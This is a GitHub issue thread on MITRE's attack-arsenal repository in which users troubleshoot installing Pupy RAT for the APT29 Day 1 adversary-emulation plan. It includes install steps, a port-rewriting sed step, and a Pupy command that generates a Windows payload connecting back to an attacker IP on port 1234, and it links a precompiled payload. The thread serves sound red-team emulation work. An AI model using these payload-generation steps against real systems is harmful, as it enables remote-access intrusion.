mitre-attack / attack-arsenal

A collection of red team and adversary emulation resources developed and released by MITRE.
Apache License 2.0

File pupy/conf/docker-compose.yml doesn't exist after install #5

Closed mark777t closed 3 years ago

mark777t commented 4 years ago

Tested on Ubuntu 18.04.3 LTS

Scenario: As described in the install_day1_tools.sh (https://github.com/mitre-attack/attack-arsenal/blob/master/adversary_emulation/APT29/Emulation_Plan/Day%201/install_day1_tools.sh)

Install pre-reqs

sudo apt update -y
sudo apt install curl git -y

Install Pupy RAT

git clone --recursive https://github.com/n1nj4sec/pupy.git
cd pupy
./install.sh
sed 's/9000:9000/1234:1234/g' pupy/conf/docker-compose.yml > /tmp/docker-compose.yml

The sed command failed because docker-compose.yml doesn't exist.

(docker installed on the system)

Can you please provide steps to fix this issue?

Thanks
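A guarded version of the sed step above, added here as an example and not part of the attack-arsenal repository or install_day1_tools.sh: it fails loudly when the compose file is missing (the exact failure reported in this issue) and verifies that the port mapping was actually rewritten. The function name and the sample compose content are constructed for this example.

```shell
#!/bin/sh
# Added example (not from the attack-arsenal repo or its install scripts).
# Rewrites a port mapping in a docker-compose.yml, refusing to proceed when
# the file is missing instead of silently writing an empty /tmp copy.

rewrite_listener_port() {
    # $1 = path to docker-compose.yml (e.g. pupy/conf/docker-compose.yml)
    # $2 = current mapping (e.g. 9000:9000), $3 = new mapping (e.g. 1234:1234)
    # $4 = destination file for the rewritten copy
    src="$1"; old="$2"; new="$3"; dst="$4"
    if [ ! -f "$src" ]; then
        # This is the case hit in the issue: the install layout changed upstream.
        echo "rewrite_listener_port: $src does not exist; check the Pupy install layout" >&2
        return 2
    fi
    if ! grep -q -- "$old" "$src"; then
        echo "rewrite_listener_port: mapping $old not found in $src" >&2
        return 3
    fi
    sed "s/$old/$new/g" "$src" > "$dst" || return 4
    # Confirm the rewrite took effect: new mapping present, old one gone.
    grep -q -- "$new" "$dst" && ! grep -q -- "$old" "$dst"
}

# Usage (mirrors the step in the issue):
#   rewrite_listener_port pupy/conf/docker-compose.yml 9000:9000 1234:1234 /tmp/docker-compose.yml
```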

jcwilliamsATmitre commented 4 years ago

@mark777t sorry to hear you ran into issues. It looks like Pupy has been going through some updates, but check out their Installation guidance -- https://github.com/n1nj4sec/pupy/wiki/Installation. In this case you just need to get Pupy installed and listen on port 1234.

Also, @Cyb3rWard0g had success using a fork and checking out an older branch -- https://github.com/Cyb3rWard0g/docker-pupy/blob/master/20191226/Dockerfile#L56-L58. You may be able to just use his Docker image as well -- https://github.com/Cyb3rWard0g/docker-pupy

Cyb3rWard0g commented 4 years ago

Hey @mark777t, yeah, Pupy from last year to today (a lot has changed). I had to create my own image and align it with the latest commit that worked with the setup for the Day 1 emulation. The instructions in the README should work for you to try Day 1 😄.

README: https://github.com/Cyb3rWard0g/docker-pupy

SCRIPT to set up the adversary depending on what day or scenario you are testing: https://github.com/OTRF/mordor-labs/blob/master/environments/attack-evals/apt29/scripts/Set-Adversary.sh

This is the part of the script that I use to run Day 1: https://github.com/OTRF/mordor-labs/blob/master/environments/attack-evals/apt29/scripts/Set-Adversary.sh#L91-L96

Video 😆 : https://youtu.be/fJAuBrzYTzI

mark777t commented 4 years ago

Hey @Cyb3rWard0g @jcwilliamsATmitre, thank you for the help. Another issue I get stuck with is that there is no static IP on my machine. Trying to create the payload: gen -o cod.3aka3.scr -f client -O windows -A x64 connect -t ec4 --host :1234. According to the output the payload is in /opt/pupy/pupy/cod.3aka3.scr, but this directory does not exist. Also, I can't change the output directory. How did you create the payload?

jcwilliamsATmitre commented 4 years ago

@mark777t check out https://github.com/mitre-attack/attack-arsenal/blob/master/adversary_emulation/APT29/Emulation_Plan/Day%201/payload_configs.md#create-day-1-payloads. We have also included a compiled payload (calling back to 192.168.0.5, https://github.com/mitre-attack/attack-arsenal/blob/master/adversary_emulation/APT29/Emulation_Plan/Day%201/payloads/cod.3aka3.scr) but if you want to generate your own we used the command gen -o cod.3aka3.scr -f client -O windows -A x64 connect -t ec4 --host <attacker IP>:1234. Here's the documentation from Pupy too if that helps - https://github.com/n1nj4sec/pupy/wiki/Get-Started#payloads-generation

You will need a static IP on your attacker host (or redirector, if we decide to use one) though, so the payload has somewhere consistent to reach back to.

mark777t commented 4 years ago

Found the payload file. In the case of Cyb3rWard0g's setup the location is inside the docker container: /var/lib/docker/overlay2/......./opt/pupy/pupy.....

mark777t commented 4 years ago

@Cyb3rWard0g How did you configure the cod.3aka3.scr payload? I configured it to the Linux IP, port 1234 (gen -o cod.3aka3.scr -f client -O windows -A x64 connect -t ec4 --host :1234). But when I run it there is no connection to the listener. Telnet to port 1234 on the Linux IP works properly. Windows Defender is disabled, and the firewall is disabled too on the Windows 10 side. Also, I see that there is a docker IP that is different from the machine IP.

Cyb3rWard0g commented 4 years ago

Hey @mark777t, I just used the one provided with the results here: https://github.com/mitre-attack/attack-arsenal/tree/master/adversary_emulation/APT29/Emulation_Plan/Day%201/payloads and just aligned my environment with almost all default settings: https://github.com/OTRF/mordor-labs/tree/master/environments/attack-evals/apt29

Cyb3rWard0g commented 4 years ago

Also remember that Day 1 has a redirector for Pupy. This is how I set up the redirector and Pupy from a network perspective: https://github.com/OTRF/mordor-labs/blob/master/environments/attack-evals/apt29/azuredeploy.json#L286-L311. I hope that helps.